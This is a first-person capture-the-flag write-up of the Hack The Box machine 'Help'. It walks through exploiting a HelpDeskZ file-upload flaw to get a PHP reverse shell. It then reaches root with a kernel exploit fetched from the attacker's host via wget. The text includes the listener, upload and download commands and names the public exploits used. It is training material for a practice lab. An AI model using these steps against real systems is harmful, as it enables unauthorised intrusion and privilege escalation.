Help — Hackthebox Writeup
Help is the first Hackthebox machine that I completed solo. I actually released this writeup when the machine was still active, and was asked to take it down. Oops!
I’m publishing this the way it was when I wrote it 2 months ago, because:
- I’m lazy and don’t want to polish it
- The improvement in both my writing style and approach/skill level has improved so much in such a short time
I can see that port 80 is open, and port 3000.
Port 80 displays an Apache2 default page, so I start gobuster.
gobuster -w /usr/share/dirb/wordlists/common.txt -u http://10.10.10.121:80/
while that runs, I check out port 3000.
Using BURP, we can see that the page just uses a GET request. The response header contains an “ETag” attribute, maybe we can see if anything is contained within the string “51-gr8XZ5dnsfHNaB2KgX/Gxm9yVZU”.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ETag
gobuster finished though, and has found the /support/ directory. Going there in our browser shows…
There’s a login section that we might be able to try and bruteforce, but I don’t like that idea when my only lead is “Shiv”. We can see an empty knowledgebase and news section, but submitting a ticket doesn’t require authentication. It turns out you can attach a file as well, which opens up the possibility of remote file inclusion.
There is also a “lost password” feature, which would be nicer to bruteforce (username-only) except there’s a captcha. Noted down this option for later, because for now I don’t want to have to learn how to bruteforce with captcha.
We can see that the software is called “HelpDeskZ”, which appears to be open source!
http://www.helpdeskz.com/
https://github.com/evolutionscript/HelpDeskZ-1.0
Back to RFI, now that we know the software is written in PHP we can try uploading a PHP reverse shell.
https://github.com/pentestmonkey/php-reverse-shell
Unfortunately, php files aren’t allowed. I change the file’s extension name to ‘shell.png’ and the ticket appears to successfully submit. If I can find its location I should be able to get a reverse shell. Back to gobuster!
gobuster -w /usr/share/dirb/wordlists/common.txt -u http://10.10.10.121:80/support/
Okay, there’s an uploads folder. That makes sense, but when I try to go to http://10.10.10.121/support/uploads/shell.png
It’s definitely time to look at the source code. In /controllers I can see “submit_ticket_controller.php”.
Line 137–165 looks like it runs if there’s a ‘ticket_attachment’. Line 138 tells us the full directory, now we know that it’s:
http://10.10.10.121/support/uploads/tickets/
Line 140 defines $ext. In our case, it’s “.png”.
Line 141 defines $filename, which is “(md5(shell.png(time()))).png”. That’s hard to read, so breaking it down… take the filename (shell.png) and add PHP time() function output to the end (for something like shell.png1555481428). MD5 that, and add .png to the end. This gives us a URL like this:
http://10.10.10.121/support/uploads/tickets/b8c1c936c90ac1aeba9571a2fbca6650.png
I wrote a little php script to spit out the filename 3 seconds before/after the current time, and ran it as soon as I could after submitting the ticket. After trying a few times and only getting “Not found” pages, it’s time to look at the source code again.
The filename is definitely correct, and extension won’t be wrong. So it must be the time() function.
curl -v http://10.10.10.121/support
According to curl, our timezone is off! I change mine to GMT +0.
Trying again, I get:
The image http://10.10.10.121/support/uploads/tickets/2de8a166abf6e7b0eddc0b7982998a99.png cannot be displayed because it contains errors.
Time to check exploitdb. https://www.exploit-db.com/exploits/40300
“The software in the default configuration allows upload for .php-Files ( ?!?! ). I think the developers thought it was no risk, because the filenames get “obfuscated” when they are uploaded. However, there is a weakness in the rename function of the uploaded file”
Looking at line 149, it appears that although the file was uploaded earlier, the file extension validation has not yet been performed. This means that despite the error message “File is not allowed” we see, the file is in the /tickets folder.
So let’s not get scared off by the “File is not allowed” error this time. The exploitdb PoC is fancier than my script as well, so let’s use that. I change it to “for x in range(-30, 30)” though, because 0,300 seems excessive and I was working with only 3 seconds just fine earlier.
I run “nc -lvnp 8000” with one window, upload “shell.php” this time, and run exploit.py:
We get our shell! The script is nice enough to print the URL for later, so when I ctrl+c out of my shell I can visit the URL again manually.
I find user.txt in ~/home/help/ and submit that hash. Now to root the box.
I like linenum.sh and enum4linux (not sure if they’re the same thing). The machine has “vi” but after trying to copy these 1000 line scripts in to the terminal and lines getting lost, I realise I need to stop being lazy. I spent enough time messing around with this that I also remembered searchsploit.
According to “uname -a”:
Linux help 4.4.0–116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
No shellcode? That’s fine. I copy /usr/share/exploitdb/exploits/linux/local/44298.c to the folder where I’m working on the box, check it compiles, and run:
python -m SimpleHTTPServer 80
On the box, I navigate to ~/tmp/ and run:
wget http://10.10.13.201/privesc.c
I compile it and run it, and voila!
I find root.txt in the root folder and submit the hash, completing my first hackthebox machine. Yay!
